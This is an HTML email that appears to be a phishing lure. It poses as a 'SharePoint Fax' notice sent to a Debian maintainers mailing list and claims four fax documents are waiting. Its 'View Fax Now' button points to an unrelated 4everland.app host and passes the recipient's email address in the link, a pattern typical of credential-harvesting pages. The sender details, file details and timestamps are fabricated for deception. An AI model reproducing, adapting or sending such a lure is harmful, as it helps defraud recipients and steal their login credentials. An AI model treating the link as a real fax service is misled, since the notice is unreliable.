<!DOCTYPE html>

<html lang="en"><head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Update</title>
<style>
    body{
        box-sizing: border-box;
        display: flex;
        height: 100vh;
        justify-content: center;
    }
    a{
        background-color: #f75050;
        text-decoration: none;
        color: #f3f3f3;
        padding: 10px;
        border-radius: 5px;
    }
</style></head>

<body style="box-sizing: border-box;
        display: flex;
        height: 100vh;
        justify-content: center">
    <div class="container">
        <p>You have 4 incoming fax documents sent to <span> debian-science-maintainers@lists.alioth.debian.org</span></p>
        <p>Receive Time: 26/07/2022 03:06:11am<span></span></p>
        <p>Transmite Time: <span>7min 21sec</span></p>
        <br>
        <div class="message">
            <p> File Type: PDF</p>
            <p> Size: 15 kb</p>
            <p> Creator: SharePoint Fax</p>
            <p><a style="background-color: #f75050;
        text-decoration: none;
        color: #f3f3f3;
        padding: 10px;
        border-radius: 5px" href="https://socia-f8snbetx-ehutchison69.4everland.app/?eml=debian-science-maintainers@lists.alioth.debian.org">View Fax Now</a></p>
            <p>If you have any questions, please let us know</p>
            <p> Copyright © 2022. All rights reserved</p>
        </div>
        <br>
        <p> This email was sent to <span> debian-science-maintainers@lists.alioth.debian.org</span></p>
    </div>

</body></html>